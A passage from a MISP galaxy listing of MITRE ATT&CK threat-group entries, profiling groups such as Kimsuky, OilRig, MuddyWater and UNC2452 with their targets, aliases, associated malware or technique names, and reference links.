Gallmaker - G0084 is also known as:

  • Gallmaker

Table 7119. Table References

Links

https://attack.mitre.org/groups/G0084

https://www.symantec.com/blogs/threat-intelligence/gallmaker-attack-group

RTM - G0048

[RTM](https://attack.mitre.org/groups/G0048) is a cybercriminal group that has been active since at least 2015 and is primarily interested in users of remote banking systems in Russia and neighboring countries. The group uses a Trojan by the same name ([RTM](https://attack.mitre.org/software/S0148)). (Citation: ESET RTM Feb 2017)

The tag is: misp-galaxy:mitre-intrusion-set="RTM - G0048"

RTM - G0048 is also known as:

  • RTM

RTM - G0048 has relationships with:

  • uses: misp-galaxy:mitre-malware="RTM - S0148" with estimative-language:likelihood-probability="almost-certain"

Table 7120. Table References

Links

https://attack.mitre.org/groups/G0048

https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf

Kimsuky - G0094

[Kimsuky](https://attack.mitre.org/groups/G0094) is a North Korea-based cyber espionage group that has been active since at least 2012. The group initially focused on targeting South Korean government entities, think tanks, and individuals identified as experts in various fields, and expanded its operations to include the United States, Russia, Europe, and the UN. [Kimsuky](https://attack.mitre.org/groups/G0094) has focused its intelligence collection activities on foreign policy and national security issues related to the Korean peninsula, nuclear policy, and sanctions.(Citation: EST Kimsuky April 2019)(Citation: BRI Kimsuky April 2019)(Citation: Cybereason Kimsuky November 2020)(Citation: Malwarebytes Kimsuky June 2021)(Citation: CISA AA20-301A Kimsuky)

[Kimsuky](https://attack.mitre.org/groups/G0094) was assessed to be responsible for the 2014 Korea Hydro & Nuclear Power Co. compromise; other notable campaigns include Operation STOLEN PENCIL (2018), Operation Kabar Cobra (2019), and Operation Smoke Screen (2019).(Citation: Netscout Stolen Pencil Dec 2018)(Citation: EST Kimsuky SmokeScreen April 2019)(Citation: AhnLab Kimsuky Kabar Cobra Feb 2019)

North Korean group definitions are known to have significant overlap, and some security researchers report all North Korean state-sponsored cyber activity under the name [Lazarus Group](https://attack.mitre.org/groups/G0032) instead of tracking clusters or subgroups.

The tag is: misp-galaxy:mitre-intrusion-set="Kimsuky - G0094"

Kimsuky - G0094 is also known as:

  • Kimsuky

  • STOLEN PENCIL

  • Thallium

  • Black Banshee

  • Velvet Chollima

Table 7121. Table References

Links

https://asert.arbornetworks.com/stolen-pencil-campaign-targets-academia/

https://attack.mitre.org/groups/G0094

https://blog.alyac.co.kr/2234

https://blog.alyac.co.kr/attachment/cfile5.uf@99A0CD415CB67E210DCEB3.pdf

https://blog.malwarebytes.com/threat-analysis/2021/06/kimsuky-apt-continues-to-target-south-korean-government-using-appleseed-backdoor/

https://brica.de/alerts/alert/public/1255063/kimsuky-unveils-apt-campaign-smoke-screen-aimed-at-korea-and-america/

https://global.ahnlab.com/global/upload/download/techreport/%5BAnalysis_Report%5DOperation%20Kabar%20Cobra.pdf

https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/

https://threatconnect.com/blog/kimsuky-phishing-operations-putting-in-work/

https://us-cert.cisa.gov/ncas/alerts/aa20-301a

https://www.cybereason.com/blog/back-to-the-future-inside-the-kimsuky-kgh-spyware-suite

https://www.zdnet.com/article/cyber-espionage-group-uses-chrome-extension-to-infect-victims/

OilRig - G0049

[OilRig](https://attack.mitre.org/groups/G0049) is a suspected Iranian threat group that has targeted Middle Eastern and international victims since at least 2014. The group has targeted a variety of sectors, including financial, government, energy, chemical, and telecommunications. It appears the group carries out supply chain attacks, leveraging the trust relationship between organizations to attack their primary targets. FireEye assesses that the group works on behalf of the Iranian government based on infrastructure details that contain references to Iran, use of Iranian infrastructure, and targeting that aligns with nation-state interests.(Citation: Palo Alto OilRig April 2017)(Citation: ClearSky OilRig Jan 2017)(Citation: Palo Alto OilRig May 2016)(Citation: Palo Alto OilRig Oct 2016)(Citation: Unit42 OilRig Playbook 2023)(Citation: FireEye APT34 Dec 2017)(Citation: Unit 42 QUADAGENT July 2018)

The tag is: misp-galaxy:mitre-intrusion-set="OilRig - G0049"

OilRig - G0049 is also known as:

  • OilRig

  • COBALT GYPSY

  • IRN2

  • APT34

  • Helix Kitten

  • Evasive Serpens

OilRig - G0049 has relationships with:

  • similar: misp-galaxy:threat-actor="OilRig" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="CHRYSENE" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

Table 7122. Table References

Links

http://researchcenter.paloaltonetworks.com/2016/05/the-oilrig-campaign-attacks-on-saudi-arabian-organizations-deliver-helminth-backdoor/

http://researchcenter.paloaltonetworks.com/2016/10/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets/

http://researchcenter.paloaltonetworks.com/2017/04/unit42-oilrig-actors-provide-glimpse-development-testing-efforts/

http://www.clearskysec.com/oilrig/

https://attack.mitre.org/groups/G0049

https://pan-unit42.github.io/playbook_viewer/

https://pan-unit42.github.io/playbook_viewer/?pb=evasive-serpens

https://research.checkpoint.com/2021/irans-apt34-returns-with-an-updated-arsenal/

https://researchcenter.paloaltonetworks.com/2018/07/unit42-oilrig-targets-technology-service-provider-government-agency-quadagent/

https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-november-helix-kitten/

https://www.fireeye.com/blog/threat-research/2017/12/targeted-attack-in-middle-east-by-apt34.html

https://www.secureworks.com/research/threat-profiles/cobalt-gypsy

NEODYMIUM - G0055

[NEODYMIUM](https://attack.mitre.org/groups/G0055) is an activity group that conducted a campaign in May 2016 and has heavily targeted Turkish victims. The group has demonstrated similarity to another activity group called [PROMETHIUM](https://attack.mitre.org/groups/G0056) due to overlapping victim and campaign characteristics. (Citation: Microsoft NEODYMIUM Dec 2016) (Citation: Microsoft SIR Vol 21) [NEODYMIUM](https://attack.mitre.org/groups/G0055) is reportedly associated closely with [BlackOasis](https://attack.mitre.org/groups/G0063) operations, but evidence that the group names are aliases has not been identified. (Citation: CyberScoop BlackOasis Oct 2017)

The tag is: misp-galaxy:mitre-intrusion-set="NEODYMIUM - G0055"

NEODYMIUM - G0055 is also known as:

  • NEODYMIUM

NEODYMIUM - G0055 has relationships with:

  • similar: misp-galaxy:microsoft-activity-group="NEODYMIUM" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="NEODYMIUM" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-malware="Wingbird - S0176" with estimative-language:likelihood-probability="almost-certain"

Table 7123. Table References

Links

http://download.microsoft.com/download/E/B/0/EB0F50CC-989C-4B66-B7F6-68CD3DC90DE3/Microsoft_Security_Intelligence_Report_Volume_21_English.pdf

https://attack.mitre.org/groups/G0055

https://blogs.technet.microsoft.com/mmpc/2016/12/14/twin-zero-day-attacks-promethium-and-neodymium-target-individuals-in-europe/

https://www.cyberscoop.com/middle-eastern-hacking-group-using-finfisher-malware-conduct-international-espionage/

PROMETHIUM - G0056

[PROMETHIUM](https://attack.mitre.org/groups/G0056) is an activity group focused on espionage that has been active since at least 2012. The group has conducted operations globally with a heavy emphasis on Turkish targets. [PROMETHIUM](https://attack.mitre.org/groups/G0056) has demonstrated similarity to another activity group called [NEODYMIUM](https://attack.mitre.org/groups/G0055) due to overlapping victim and campaign characteristics.(Citation: Microsoft NEODYMIUM Dec 2016)(Citation: Microsoft SIR Vol 21)(Citation: Talos Promethium June 2020)

The tag is: misp-galaxy:mitre-intrusion-set="PROMETHIUM - G0056"

PROMETHIUM - G0056 is also known as:

  • PROMETHIUM

  • StrongPity

PROMETHIUM - G0056 has relationships with:

  • similar: misp-galaxy:threat-actor="PROMETHIUM" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:microsoft-activity-group="PROMETHIUM" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-malware="Truvasys - S0178" with estimative-language:likelihood-probability="almost-certain"

Table 7124. Table References

Links

http://download.microsoft.com/download/E/B/0/EB0F50CC-989C-4B66-B7F6-68CD3DC90DE3/Microsoft_Security_Intelligence_Report_Volume_21_English.pdf

https://attack.mitre.org/groups/G0056

https://blog.talosintelligence.com/2020/06/promethium-extends-with-strongpity3.html

https://blogs.technet.microsoft.com/mmpc/2016/12/14/twin-zero-day-attacks-promethium-and-neodymium-target-individuals-in-europe/

https://www.bitdefender.com/files/News/CaseStudies/study/353/Bitdefender-Whitepaper-StrongPity-APT.pdf

Leviathan - G0065

[Leviathan](https://attack.mitre.org/groups/G0065) is a Chinese state-sponsored cyber espionage group that has been attributed to the Ministry of State Security’s (MSS) Hainan State Security Department and an affiliated front company.(Citation: CISA AA21-200A APT40 July 2021) Active since at least 2009, [Leviathan](https://attack.mitre.org/groups/G0065) has targeted the following sectors: academia, aerospace/aviation, biomedical, defense industrial base, government, healthcare, manufacturing, maritime, and transportation across the US, Canada, Europe, the Middle East, and Southeast Asia.(Citation: CISA AA21-200A APT40 July 2021)(Citation: Proofpoint Leviathan Oct 2017)(Citation: FireEye Periscope March 2018)

The tag is: misp-galaxy:mitre-intrusion-set="Leviathan - G0065"

Leviathan - G0065 is also known as:

  • Leviathan

  • MUDCARP

  • Kryptonite Panda

  • Gadolinium

  • BRONZE MOHAWK

  • TEMP.Jumper

  • APT40

  • TEMP.Periscope

Leviathan - G0065 has relationships with:

  • similar: misp-galaxy:threat-actor="APT40" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation Event Subscription - T1084" with estimative-language:likelihood-probability="almost-certain"

Table 7125. Table References

Links

https://attack.mitre.org/groups/G0065

https://us-cert.cisa.gov/ncas/alerts/aa21-200a

https://www.accenture.com/us-en/blogs/cyber-defense/mudcarps-focus-on-submarine-technologies

https://www.crowdstrike.com/blog/two-birds-one-stone-panda/

https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html

https://www.fireeye.com/blog/threat-research/2019/03/apt40-examining-a-china-nexus-espionage-actor.html

https://www.microsoft.com/security/blog/2020/09/24/gadolinium-detecting-empires-cloud/

https://www.proofpoint.com/us/threat-insight/post/leviathan-espionage-actor-spearphishes-maritime-and-defense-targets

https://www.secureworks.com/research/threat-profiles/bronze-mohawk

Rancor - G0075

[Rancor](https://attack.mitre.org/groups/G0075) is a threat group that has led targeted campaigns against the South East Asia region. [Rancor](https://attack.mitre.org/groups/G0075) uses politically-motivated lures to entice victims to open malicious documents. (Citation: Rancor Unit42 June 2018)

The tag is: misp-galaxy:mitre-intrusion-set="Rancor - G0075"

Rancor - G0075 is also known as:

  • Rancor

Table 7126. Table References

Links

https://attack.mitre.org/groups/G0075

https://researchcenter.paloaltonetworks.com/2018/06/unit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families/

Machete - G0095

[Machete](https://attack.mitre.org/groups/G0095) is a suspected Spanish-speaking cyber espionage group that has been active since at least 2010. It has primarily focused its operations within Latin America, with a particular emphasis on Venezuela, but also in the US, Europe, Russia, and parts of Asia. [Machete](https://attack.mitre.org/groups/G0095) generally targets high-profile organizations such as government institutions, intelligence services, and military units, as well as telecommunications and power companies.(Citation: Cylance Machete Mar 2017)(Citation: Securelist Machete Aug 2014)(Citation: ESET Machete July 2019)(Citation: 360 Machete Sep 2020)

The tag is: misp-galaxy:mitre-intrusion-set="Machete - G0095"

Machete - G0095 is also known as:

  • Machete

  • APT-C-43

  • El Machete

Machete - G0095 has relationships with:

  • similar: misp-galaxy:360net-threat-actor="Machete - APT-C-43" with estimative-language:likelihood-probability="likely"

Table 7127. Table References

Links

https://attack.mitre.org/groups/G0095

https://blog.360totalsecurity.com/en/apt-c-43-steals-venezuelan-military-secrets-to-provide-intelligence-support-for-the-reactionaries-hpreact-campaign/

https://securelist.com/el-machete/66108/

https://threatvector.cylance.com/en_us/home/el-machete-malware-attacks-cut-through-latam.html

https://www.welivesecurity.com/wp-content/uploads/2019/08/ESET_Machete.pdf

Elderwood - G0066

[Elderwood](https://attack.mitre.org/groups/G0066) is a suspected Chinese cyber espionage group that was reportedly responsible for the 2009 Google intrusion known as Operation Aurora. (Citation: Security Affairs Elderwood Sept 2012) The group has targeted defense organizations, supply chain manufacturers, human rights and nongovernmental organizations (NGOs), and IT service providers. (Citation: Symantec Elderwood Sept 2012) (Citation: CSM Elderwood Sept 2012)

The tag is: misp-galaxy:mitre-intrusion-set="Elderwood - G0066"

Elderwood - G0066 is also known as:

  • Elderwood

  • Elderwood Gang

  • Beijing Group

  • Sneaky Panda

Elderwood - G0066 has relationships with:

  • similar: misp-galaxy:threat-actor="Beijing Group" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Drive-by Compromise - T1189" with estimative-language:likelihood-probability="almost-certain"

Table 7128. Table References

Links

http://securityaffairs.co/wordpress/8528/hacking/elderwood-project-who-is-behind-op-aurora-and-ongoing-attacks.html

https://attack.mitre.org/groups/G0066

https://web.archive.org/web/20190717233006/http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-elderwood-project.pdf

https://www.csmonitor.com/USA/2012/0914/Stealing-US-business-secrets-Experts-ID-two-huge-cyber-gangs-in-China

Thrip - G0076

[Thrip](https://attack.mitre.org/groups/G0076) is an espionage group that has targeted satellite communications, telecoms, and defense contractor companies in the U.S. and Southeast Asia. The group uses custom malware as well as "living off the land" techniques. (Citation: Symantec Thrip June 2018)

The tag is: misp-galaxy:mitre-intrusion-set="Thrip - G0076"

Thrip - G0076 is also known as:

  • Thrip

Table 7129. Table References

Links

https://attack.mitre.org/groups/G0076

https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets

PLATINUM - G0068

[PLATINUM](https://attack.mitre.org/groups/G0068) is an activity group that has targeted victims since at least 2009. The group has focused on targets associated with governments and related organizations in South and Southeast Asia. (Citation: Microsoft PLATINUM April 2016)

The tag is: misp-galaxy:mitre-intrusion-set="PLATINUM - G0068"

PLATINUM - G0068 is also known as:

  • PLATINUM

PLATINUM - G0068 has relationships with:

  • similar: misp-galaxy:microsoft-activity-group="PLATINUM" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="PLATINUM" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Input Capture - T1056" with estimative-language:likelihood-probability="almost-certain"

Table 7130. Table References

Links

https://attack.mitre.org/groups/G0068

https://download.microsoft.com/download/2/2/5/225BFE3E-E1DE-4F5B-A77B-71200928D209/Platinum%20feature%20article%20-%20Targeted%20attacks%20in%20South%20and%20Southeast%20Asia%20April%202016.pdf

MuddyWater - G0069

[MuddyWater](https://attack.mitre.org/groups/G0069) is a cyber espionage group assessed to be a subordinate element within Iran’s Ministry of Intelligence and Security (MOIS).(Citation: CYBERCOM Iranian Intel Cyber January 2022) Since at least 2017, [MuddyWater](https://attack.mitre.org/groups/G0069) has targeted a range of government and private organizations across sectors, including telecommunications, local government, defense, and oil and natural gas organizations, in the Middle East, Asia, Africa, Europe, and North America.(Citation: Unit 42 MuddyWater Nov 2017)(Citation: Symantec MuddyWater Dec 2018)(Citation: ClearSky MuddyWater Nov 2018)(Citation: ClearSky MuddyWater June 2019)(Citation: Reaqta MuddyWater November 2017)(Citation: DHS CISA AA22-055A MuddyWater February 2022)(Citation: Talos MuddyWater Jan 2022)

The tag is: misp-galaxy:mitre-intrusion-set="MuddyWater - G0069"

MuddyWater - G0069 is also known as:

  • MuddyWater

  • Earth Vetala

  • MERCURY

  • Static Kitten

  • Seedworm

  • TEMP.Zagros

MuddyWater - G0069 has relationships with:

  • similar: misp-galaxy:threat-actor="MuddyWater" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Mshta - T1170" with estimative-language:likelihood-probability="almost-certain"

Table 7131. Table References

Links

https://attack.mitre.org/groups/G0069

https://blog.talosintelligence.com/2022/01/iranian-apt-muddywater-targets-turkey.html

https://reaqta.com/2017/11/muddywater-apt-targeting-middle-east/

https://researchcenter.paloaltonetworks.com/2017/11/unit42-muddying-the-water-targeted-attacks-in-the-middle-east/

https://www.anomali.com/blog/probable-iranian-cyber-actors-static-kitten-conducting-cyberespionage-campaign-targeting-uae-and-kuwait-government-agencies

https://www.cisa.gov/uscert/ncas/alerts/aa22-055a

https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf

https://www.clearskysec.com/wp-content/uploads/2019/06/Clearsky-Iranian-APT-group-%E2%80%98MuddyWater%E2%80%99-Adds-Exploits-to-Their-Arsenal.pdf

https://www.cybercom.mil/Media/News/Article/2897570/iranian-intel-cyber-suite-of-malware-uses-open-source-tools/

https://www.fireeye.com/blog/threat-research/2018/03/iranian-threat-group-updates-ttps-in-spear-phishing-campaign.html

https://www.symantec.com/blogs/threat-intelligence/seedworm-espionage-group

https://www.trendmicro.com/en_us/research/21/c/earth-vetala---muddywater-continues-to-target-organizations-in-t.html

Leafminer - G0077

[Leafminer](https://attack.mitre.org/groups/G0077) is an Iranian threat group that has targeted government organizations and business entities in the Middle East since at least early 2017. (Citation: Symantec Leafminer July 2018)

The tag is: misp-galaxy:mitre-intrusion-set="Leafminer - G0077"

Leafminer - G0077 is also known as:

  • Leafminer

  • Raspite

Table 7132. Table References

Links

https://attack.mitre.org/groups/G0077

https://www.dragos.com/blog/20180802Raspite.html

https://www.symantec.com/blogs/threat-intelligence/leafminer-espionage-middle-east

DarkHydrus - G0079

[DarkHydrus](https://attack.mitre.org/groups/G0079) is a threat group that has targeted government agencies and educational institutions in the Middle East since at least 2016. The group heavily leverages open-source tools and custom payloads for carrying out attacks. (Citation: Unit 42 DarkHydrus July 2018) (Citation: Unit 42 Playbook Dec 2017)

The tag is: misp-galaxy:mitre-intrusion-set="DarkHydrus - G0079"

DarkHydrus - G0079 is also known as:

  • DarkHydrus

Table 7133. Table References

Links

https://attack.mitre.org/groups/G0079

https://pan-unit42.github.io/playbook_viewer/

https://researchcenter.paloaltonetworks.com/2018/07/unit42-new-threat-actor-group-darkhydrus-targets-middle-east-government/

BlackTech - G0098

[BlackTech](https://attack.mitre.org/groups/G0098) is a suspected Chinese cyber espionage group that has primarily targeted organizations in East Asia—​particularly Taiwan, Japan, and Hong Kong—​and the US since at least 2013. [BlackTech](https://attack.mitre.org/groups/G0098) has used a combination of custom malware, dual-use tools, and living off the land tactics to compromise media, construction, engineering, electronics, and financial company networks.(Citation: TrendMicro BlackTech June 2017)(Citation: Symantec Palmerworm Sep 2020)(Citation: Reuters Taiwan BlackTech August 2020)

The tag is: misp-galaxy:mitre-intrusion-set="BlackTech - G0098"

BlackTech - G0098 is also known as:

  • BlackTech

  • Palmerworm

Table 7134. Table References

Links

https://attack.mitre.org/groups/G0098

https://blog.trendmicro.com/trendlabs-security-intelligence/following-trail-blacktech-cyber-espionage-campaigns/

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/palmerworm-blacktech-espionage-apt

https://www.ironnet.com/blog/china-cyber-attacks-the-current-threat-landscape

https://www.reuters.com/article/us-taiwan-cyber-china/taiwan-says-china-behind-cyberattacks-on-government-agencies-emails-idUSKCN25F0JK

TA2541 - G1018

[TA2541](https://attack.mitre.org/groups/G1018) is a cybercriminal group that has been targeting the aviation, aerospace, transportation, manufacturing, and defense industries since at least 2017. [TA2541](https://attack.mitre.org/groups/G1018) campaigns are typically high volume and involve the use of commodity remote access tools obfuscated by crypters and themes related to aviation, transportation, and travel.(Citation: Proofpoint TA2541 February 2022)(Citation: Cisco Operation Layover September 2021)

The tag is: misp-galaxy:mitre-intrusion-set="TA2541 - G1018"

TA2541 - G1018 is also known as:

  • TA2541

Table 7135. Table References

Links

https://attack.mitre.org/groups/G1018

https://blog.talosintelligence.com/operation-layover-how-we-tracked-attack/

https://www.proofpoint.com/us/blog/threat-insight/charting-ta2541s-flight

FIN13 - G1016

[FIN13](https://attack.mitre.org/groups/G1016) is a financially motivated cyber threat group that has targeted the financial, retail, and hospitality industries in Mexico and Latin America, as early as 2016. [FIN13](https://attack.mitre.org/groups/G1016) achieves its objectives by stealing intellectual property, financial data, mergers and acquisition information, or PII.(Citation: Mandiant FIN13 Aug 2022)(Citation: Sygnia Elephant Beetle Jan 2022)

The tag is: misp-galaxy:mitre-intrusion-set="FIN13 - G1016"

FIN13 - G1016 is also known as:

  • FIN13

  • Elephant Beetle

Table 7136. Table References

Links

https://attack.mitre.org/groups/G1016

https://f.hubspotusercontent30.net/hubfs/8776530/Sygnia-%20Elephant%20Beetle_Jan2022.pdf?hstc=147695848.3e8f1a482c8f8d4531507747318e660b.1680005306711.1680005306711.1680005306711.1&hssc=147695848.1.1680005306711&hsfp=3000179024&hsCtaTracking=189ec409-ae2d-4909-8bf1-62dcdd694372%7Cca91d317-8f10-4a38-9f80-367f551ad64d

https://www.mandiant.com/resources/blog/fin13-cybercriminal-mexico

UNC2452 - G0118

[UNC2452](https://attack.mitre.org/groups/G0118) is a suspected Russian state-sponsored threat group responsible for the 2020 SolarWinds software supply chain intrusion.(Citation: FireEye SUNBURST Backdoor December 2020) Victims of this campaign include government, consulting, technology, telecom, and other organizations in North America, Europe, Asia, and the Middle East.(Citation: FireEye SUNBURST Backdoor December 2020) The group also compromised at least one think tank by late 2019.(Citation: Volexity SolarWinds)

The tag is: misp-galaxy:mitre-intrusion-set="UNC2452 - G0118"

UNC2452 - G0118 is also known as:

  • UNC2452

  • NOBELIUM

  • StellarParticle

  • Dark Halo

Table 7137. Table References

Links

https://attack.mitre.org/groups/G0118

https://www.crowdstrike.com/blog/sunspot-malware-technical-analysis/

https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html

https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/

https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/

TA551 - G0127

[TA551](https://attack.mitre.org/groups/G0127) is a financially-motivated threat group that has been active since at least 2018. (Citation: Secureworks GOLD CABIN) The group has primarily targeted English, German, Italian, and Japanese speakers through email-based malware distribution campaigns. (Citation: Unit 42 TA551 Jan 2021)

The tag is: misp-galaxy:mitre-intrusion-set="TA551 - G0127"

TA551 - G0127 is also known as:

  • TA551

  • GOLD CABIN

  • Shathak

Table 7138. Table References

Links

https://attack.mitre.org/groups/G0127

https://unit42.paloaltonetworks.com/ta551-shathak-icedid/

https://unit42.paloaltonetworks.com/valak-evolution/

https://www.secureworks.com/research/threat-profiles/gold-cabin

CURIUM - G1012

[CURIUM](https://attack.mitre.org/groups/G1012) is an Iranian threat group first reported in November 2021 that has invested in building a relationship with potential targets via social media over a period of months to establish trust and confidence before sending malware. Security researchers note [CURIUM](https://attack.mitre.org/groups/G1012) has demonstrated great patience and persistence by chatting with potential targets daily and sending benign files to help lower their security consciousness.(Citation: Microsoft Iranian Threat Actor Trends November 2021)

The tag is: misp-galaxy:mitre-intrusion-set="CURIUM - G1012"

CURIUM - G1012 is also known as:

  • CURIUM

Table 7139. Table References

Links

https://attack.mitre.org/groups/G1012

https://www.microsoft.com/en-us/security/blog/2021/11/16/evolving-trends-in-iranian-threat-actor-activity-mstic-presentation-at-cyberwarcon-2021

Sidewinder - G0121

[Sidewinder](https://attack.mitre.org/groups/G0121) is a suspected Indian threat actor group that has been active since at least 2012. They have been observed targeting government, military, and business entities throughout Asia, primarily focusing on Pakistan, China, Nepal, and Afghanistan.(Citation: ATT Sidewinder January 2021)(Citation: Securelist APT Trends April 2018)(Citation: Cyble Sidewinder September 2020)

The tag is: misp-galaxy:mitre-intrusion-set="Sidewinder - G0121"

Sidewinder - G0121 is also known as:

  • Sidewinder

  • T-APT-04

  • Rattlesnake

Sidewinder - G0121 has relationships with:

  • similar: misp-galaxy:360net-threat-actor="响尾蛇 - APT-C-24" with estimative-language:likelihood-probability="likely"

Table 7140. Table References

Links

https://attack.mitre.org/groups/G0121

https://cdn-cybersecurity.att.com/docs/global-perspective-of-the-sidewinder-apt.pdf

https://cybleinc.com/2020/09/26/sidewinder-apt-targets-with-futuristic-tactics-and-techniques/

https://securelist.com/apt-trends-report-q1-2018/85280/

Windshift - G0112

[Windshift](https://attack.mitre.org/groups/G0112) is a threat group that has been active since at least 2017, targeting specific individuals for surveillance in government departments and critical infrastructure across the Middle East.(Citation: SANS Windshift August 2018)(Citation: objective-see windtail1 dec 2018)(Citation: objective-see windtail2 jan 2019)

The tag is: misp-galaxy:mitre-intrusion-set="Windshift - G0112"

Windshift - G0112 is also known as:

  • Windshift

  • Bahamut

Table 7141. Table References

Links

https://attack.mitre.org/groups/G0112

https://objective-see.com/blog/blog_0x3B.html

https://objective-see.com/blog/blog_0x3D.html

https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1554718868.pdf

Metador - G1013

[Metador](https://attack.mitre.org/groups/G1013) is a suspected cyber espionage group that was first reported in September 2022. [Metador](https://attack.mitre.org/groups/G1013) has targeted a limited number of telecommunication companies, internet service providers, and universities in the Middle East and Africa. Security researchers named the group [Metador](https://attack.mitre.org/groups/G1013) based on the "I am meta" string in one of the group’s malware samples and the expectation of Spanish-language responses from C2 servers.(Citation: SentinelLabs Metador Sept 2022)

The tag is: misp-galaxy:mitre-intrusion-set="Metador - G1013"

Metador - G1013 is also known as:

  • Metador

Table 7142. Table References

Links

https://assets.sentinelone.com/sentinellabs22/metador#page=1

https://attack.mitre.org/groups/G1013

Chimera - G0114

[Chimera](https://attack.mitre.org/groups/G0114) is a suspected China-based threat group that has been active since at least 2018 targeting the semiconductor industry in Taiwan as well as data from the airline industry.(Citation: Cycraft Chimera April 2020)(Citation: NCC Group Chimera January 2021)

The tag is: misp-galaxy:mitre-intrusion-set="Chimera - G0114"

Chimera - G0114 is also known as:

  • Chimera

Table 7143. Table References

Links

https://attack.mitre.org/groups/G0114

https://cycraft.com/download/CyCraft-Whitepaper-Chimera_V4.1.pdf

https://research.nccgroup.com/2021/01/12/abusing-cloud-services-to-fly-under-the-radar/

Gelsemium - G0141

[Gelsemium](https://attack.mitre.org/groups/G0141) is a cyberespionage group that has been active since at least 2014, targeting governmental institutions, electronics manufacturers, universities, and religious organizations in East Asia and the Middle East.(Citation: ESET Gelsemium June 2021)

The tag is: misp-galaxy:mitre-intrusion-set="Gelsemium - G0141"

Gelsemium - G0141 is also known as:

  • Gelsemium

Table 7144. Table References

Links

https://attack.mitre.org/groups/G0141

https://www.welivesecurity.com/wp-content/uploads/2021/06/eset_gelsemium.pdf

LuminousMoth - G1014

[LuminousMoth](https://attack.mitre.org/groups/G1014) is a Chinese-speaking cyber espionage group that has been active since at least October 2020. [LuminousMoth](https://attack.mitre.org/groups/G1014) has targeted high-profile organizations, including government entities, in Myanmar, the Philippines, Thailand, and other parts of Southeast Asia. Some security researchers have concluded there is a connection between [LuminousMoth](https://attack.mitre.org/groups/G1014) and [Mustang Panda](https://attack.mitre.org/groups/G0129) based on similar targeting and TTPs, as well as network infrastructure overlaps.(Citation: Kaspersky LuminousMoth July 2021)(Citation: Bitdefender LuminousMoth July 2021)

The tag is: misp-galaxy:mitre-intrusion-set="LuminousMoth - G1014"

LuminousMoth - G1014 is also known as:

  • LuminousMoth

Table 7145. Table References

Links

https://attack.mitre.org/groups/G1014

https://securelist.com/apt-luminousmoth/103332/

https://www.bitdefender.com/blog/labs/luminousmoth-plugx-file-exfiltration-and-persistence-revisited

MoustachedBouncer - G1019

[MoustachedBouncer](https://attack.mitre.org/groups/G1019) is a cyberespionage group that has been active since at least 2014 targeting foreign embassies in Belarus.(Citation: MoustachedBouncer ESET August 2023)

The tag is: misp-galaxy:mitre-intrusion-set="MoustachedBouncer - G1019"

MoustachedBouncer - G1019 is also known as:

  • MoustachedBouncer

Table 7146. Table References

Links

https://attack.mitre.org/groups/G1019

https://www.welivesecurity.com/en/eset-research/moustachedbouncer-espionage-against-foreign-diplomats-in-belarus/

CostaRicto - G0132

[CostaRicto](https://attack.mitre.org/groups/G0132) is a suspected hacker-for-hire cyber espionage campaign that has targeted multiple industries worldwide since at least 2019. [CostaRicto](https://attack.mitre.org/groups/G0132)'s targets, a large portion of which are financial institutions, are scattered across Europe, the Americas, Asia, Australia, and Africa, with a large concentration in South Asia.(Citation: BlackBerry CostaRicto November 2020)

The tag is: misp-galaxy:mitre-intrusion-set="CostaRicto - G0132"

CostaRicto - G0132 is also known as:

  • CostaRicto

Table 7147. Table References

Links

https://attack.mitre.org/groups/G0132

https://blogs.blackberry.com/en/2020/11/the-costaricto-campaign-cyber-espionage-outsourced

Confucius - G0142

[Confucius](https://attack.mitre.org/groups/G0142) is a cyber espionage group that has primarily targeted military personnel, high-profile personalities, business persons, and government organizations in South Asia since at least 2013. Security researchers have noted similarities between [Confucius](https://attack.mitre.org/groups/G0142) and [Patchwork](https://attack.mitre.org/groups/G0040), particularly in their respective custom malware code and targets.(Citation: TrendMicro Confucius APT Feb 2018)(Citation: TrendMicro Confucius APT Aug 2021)(Citation: Uptycs Confucius APT Jan 2021)

The tag is: misp-galaxy:mitre-intrusion-set="Confucius - G0142"

Confucius - G0142 is also known as:

  • Confucius

  • Confucius APT

Table 7148. Table References

Links

https://attack.mitre.org/groups/G0142

https://www.trendmicro.com/en_us/research/18/b/deciphering-confucius-cyberespionage-operations.html

https://www.trendmicro.com/en_us/research/21/h/confucius-uses-pegasus-spyware-related-lures-to-target-pakistani.html

https://www.uptycs.com/blog/confucius-apt-deploys-warzone-rat

Windigo - G0124

